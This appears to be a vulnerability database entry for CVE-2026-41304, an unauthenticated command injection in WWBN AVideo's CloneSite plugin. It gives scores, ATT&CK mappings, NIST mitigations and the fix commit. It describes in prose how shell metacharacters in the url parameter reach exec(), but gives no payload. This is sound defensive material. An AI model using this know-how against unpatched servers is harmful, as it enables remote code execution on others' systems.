Cyber Resilience

CVE-2026-41304

HighPublic PoCRCE

Published: 22 April 2026

Published
22 April 2026
Modified
24 April 2026
KEV Added
Patch
CVSS Score v4 8.9 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0222 80.4th percentile
Risk Priority 55 floored blend · peak EPSS

Summary

CVE-2026-41304 is a high-severity Command Injection (CWE-77) vulnerability in Wwbn Avideo. Its CVSS base score is 8.9 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 19.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

WWBN AVideo is an open source video platform that contains a command injection vulnerability in versions 29.0 and below. The flaw resides in the cloneServer.json.php endpoint of the CloneSite plugin, which constructs shell commands by directly concatenating unsanitized user input from the url parameter into a wget command executed via exec(). This allows an attacker to break out of the intended URL context using shell metacharacters such as semicolons, resulting in arbitrary command execution on the server. The issue is tracked under CWE-77 and carries a CVSS 4.0 score of 8.9.

Unauthenticated remote attackers can exploit the endpoint over the network without authentication or user interaction to achieve full remote code execution, gaining the ability to run arbitrary shell commands on the affected server.

The vulnerability is fixed in commit 473c609fc2defdea8b937b00e86ce88eba1f15bb, with details published in the associated GitHub security advisory GHSA-xr6f-h4x7-r6qp.

The EPSS score reached a peak of 0.0131 from a current value of 0.0065, indicating limited but observable post-disclosure interest.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command…

more

executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Unauthenticated command injection in a public-facing web endpoint enables exploitation of public-facing applications (T1190) and execution of arbitrary Unix shell commands (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-33319Same product: Wwbn Avideo
CVE-2026-41064Same product: Wwbn Avideo
CVE-2026-33648Same product: Wwbn Avideo
CVE-2026-33482Same product: Wwbn Avideo
CVE-2026-33478Same product: Wwbn Avideo
CVE-2026-33292Same product: Wwbn Avideo
CVE-2026-33479Same product: Wwbn Avideo
CVE-2026-33767Same product: Wwbn Avideo
CVE-2026-33770Same product: Wwbn Avideo
CVE-2026-33038Same product: Wwbn Avideo

Affected Assets

wwbn
avideo
≤ 29.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires validation and sanitization of the untrusted 'url' parameter before it is concatenated into a shell command executed via exec().

prevent

Mandates prompt application of the vendor fix (commit 473c609) that eliminates the unsanitized command construction in cloneServer.json.php.

prevent

Restricts availability of dangerous functions such as exec() and external utilities like wget that the vulnerable endpoint relies on.

References